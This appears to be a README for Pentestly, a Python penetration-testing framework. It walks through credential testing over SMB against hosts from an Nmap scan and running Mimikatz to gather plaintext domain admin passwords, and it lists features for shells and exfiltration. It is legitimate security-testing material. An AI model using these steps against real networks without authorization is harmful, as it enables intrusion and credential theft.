Pentestly – Python tools for penetration testing

What is Pentestly?
Pentestly is a growing collection of Python tools for use in penetration tests. The goal is to offer a familiar user interface while keeping contributions to the framework easy, thanks to Python.

Install
Download Pentestly:

git clone https://github.com/praetorian-inc/pentestly.git

Install and run Pentestly:

./install.sh
./pentestly

Features

  • Import Nmap XML
  • Test SMB authentication using:
      • individual credentials
      • a file containing credentials
      • null credentials
      • an NTLM hash
  • Test for local administrator privileges after a successful SMB authentication
  • Identify readable SMB shares for valid credentials
  • Store Domain/Enterprise Admin account names
  • Determine where Domain Admin processes are running
  • Determine which systems Domain Admins are logged in to
  • Execute PowerShell commands in memory and exfiltrate the results
  • Execute Mimikatz to gather plaintext passwords from memory (Invoke-Mimikatz.ps1)
  • Receive a command shell (Powercat)
  • Receive a Meterpreter session (Invoke-Shellcode.ps1)

Shoulders of Giants

Pentestly stands on the shoulders of giants. Below are the tools currently utilized in Pentestly:

  • recon-ng – The recon-ng backend database is beautifully made and is leveraged in Pentestly for data manipulation
  • wmiexec.py – Allows us to execute PowerShell commands quickly and easily via WMI
  • smbmap.py – Useful utility for enumerating SMB shares
  • Invoke-Mimikatz.ps1 – Implementation of Mimikatz in PowerShell

Usage
Let’s walk through several functions currently implemented.

Change workspace

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Load from Nmap

>load nmap
>set filename /root/PROJECT/full-all-alive.xml
>show options
>run

Test logins

Use a file of credentials to test logins

[pentestly][default] > cat /tmp/creds
[*] Command: cat /tmp/creds
admin 123456
admin password
[pentestly][default] > load login
[pentestly][default][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][default][login] > set username ''
USERNAME => ''
[pentestly][default][login] > set password ''
PASSWORD => ''
[pentestly][default][login] > run

Use a single username and password

[pentestly][project]> load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Use credentials over a subset of IPs, e.g. only the 192.168.1.0/24 hosts found in the table

[pentestly][project]> load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.1.%'

Gather Domain and Enterprise Admins

>load get_domain
>show options
>run

Run Mimikatz over the IPs where the credentials have execution rights

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Starting web server
Select local interface for hosting scripts

0. 127.0.0.1
1. 192.168.1.13
> 0

[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:password  - DOMAIN ADMIN!

Source: https://github.com/praetorian-inc/pentestly